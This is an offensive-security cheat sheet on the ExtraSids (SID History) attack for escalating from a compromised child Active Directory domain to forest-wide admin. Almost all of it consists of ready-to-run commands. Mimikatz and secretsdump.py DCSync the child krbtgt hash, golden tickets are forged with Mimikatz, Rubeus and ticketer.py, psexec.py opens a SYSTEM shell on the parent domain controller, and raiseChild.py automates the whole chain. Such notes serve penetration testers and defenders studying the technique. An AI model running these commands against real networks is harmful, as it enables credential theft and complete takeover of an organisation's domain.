
Child -> Parent Trusts

Windows

ExtraSids Attack - Mimikatz

SID filtering is not enforced on trusts between domains of the same forest, so a TGT forged in the child domain whose SID History (the "extra SID") carries the root domain's Enterprise Admins SID is honoured by the parent domain's DC as a forest-wide admin. To perform this attack after compromising a child domain, we need the following:

  • The KRBTGT hash for the child domain

  • The SID for the child domain

  • The name of a target user in the child domain (does not need to exist!)

  • The FQDN of the child domain.

  • The SID of the Enterprise Admins group of the root domain.

With this data collected, the attack can be performed with Mimikatz.

# Obtaining the KRBTGT account's NT hash with Mimikatz, run as a child domain admin (CHILD = child domain NetBIOS name). The "Object Security ID" in the output is the child domain SID with the krbtgt RID (-502) appended, so it also gives the SID
mimikatz # lsadump::dcsync /user:CHILD\krbtgt

# alternative to get SID using PowerView
Get-DomainSID

# Obtaining the Enterprise Admins group's SID with PowerView's Get-DomainGroup. The group only exists in the forest root domain, so query the root (DOMAIN.LOCAL), not the child
Get-DomainGroup -Domain DOMAIN.LOCAL -Identity "Enterprise Admins" | select distinguishedname,objectsid

# Or with the ActiveDirectory module cmdlet (the SID is in the SID property of the result)
Get-ADGroup -Identity "Enterprise Admins" -Server "DOMAIN.LOCAL"

# Creating a Golden Ticket with Mimikatz: /sid is the child domain SID, /krbtgt the child krbtgt NT hash, /sids the root domain's Enterprise Admins SID (RID 519) placed in SID History, /ptt loads the ticket into the current session
mimikatz # kerberos::golden /user:hacker /domain:CHILD.DOMAIN.LOCAL /sid:S-1-5-21-2806153819-209893948-922872689 /krbtgt:9d765b482771505cbe97411065964d5f /sids:S-1-5-21-3842939050-3880317879-2865463114-519 /ptt

# Checking that the golden ticket for the non-existent user hacker is in memory
klist

ExtraSids Attack - Rubeus

# Creating a Golden Ticket with Rubeus: same inputs as the Mimikatz version, /rc4 is the krbtgt NT hash
.\Rubeus.exe golden /rc4:9d765b482771505cbe97411065964d5f /domain:CHILD.DOMAIN.LOCAL /sid:S-1-5-21-2806153819-209893948-922872689 /sids:S-1-5-21-3842939050-3880317879-2865463114-519 /user:hacker /ptt

Linux

# Performing DCSync with secretsdump.py against the child DC (adm = a child domain admin, ip = child DC; you are prompted for the password). The output includes the krbtgt NT hash
secretsdump.py child.domain.local/adm@ip -just-dc-user child/krbtgt

# Brute forcing RIDs with lookupsid.py against the child DC: the "[*] Domain SID is:" line is the child domain SID, and each enumerated object's SID is DOMAIN_SID-RID
lookupsid.py child.domain.local/adm@ip

# Getting the root domain SID and the Enterprise Admins RID (519): run lookupsid.py against the parent (root) DC. The root domain SID from the "[*] Domain SID is:" header plus "-519" is the extra SID for the ticket
lookupsid.py child.domain.local/adm@root_dc_ip | grep -B12 "Enterprise Admins"

# Constructing a Golden Ticket using ticketer.py
ticketer.py -nthash 9d7---5f -domain CHILD.DOMAIN.LOCAL -domain-sid S-1-5-21-2806153819-209893948-922872689 -extra-sid S-1-5-21-3842939050-3880317879-2865463114-519 hacker

# Pointing the Impacket tools at the ticket ticketer.py wrote (<user>.ccache in the current directory) via the KRB5CCNAME environment variable
export KRB5CCNAME=hacker.ccache

# Getting a SYSTEM shell on the parent domain's DC with Impacket's psexec.py using the forged ticket: target the DC by its FQDN (Kerberos needs the service name to match) and give the address with -target-ip
psexec.py CHILD.DOMAIN.LOCAL/hacker@dc01.domain.local -k -no-pass -target-ip ip

Or, automating all of the above:
# raiseChild.py needs only child domain admin credentials: it locates the child and root DCs and their SIDs, looks up the root Enterprise Admins SID, DCSyncs the child krbtgt, forges the ExtraSids golden ticket, uses it to dump the forest root's Administrator credentials, and with -target-exec runs psexec on the given host (the parent DC)
raiseChild.py -target-exec ip CHILD.DOMAIN.LOCAL/adm

Last updated 2 years ago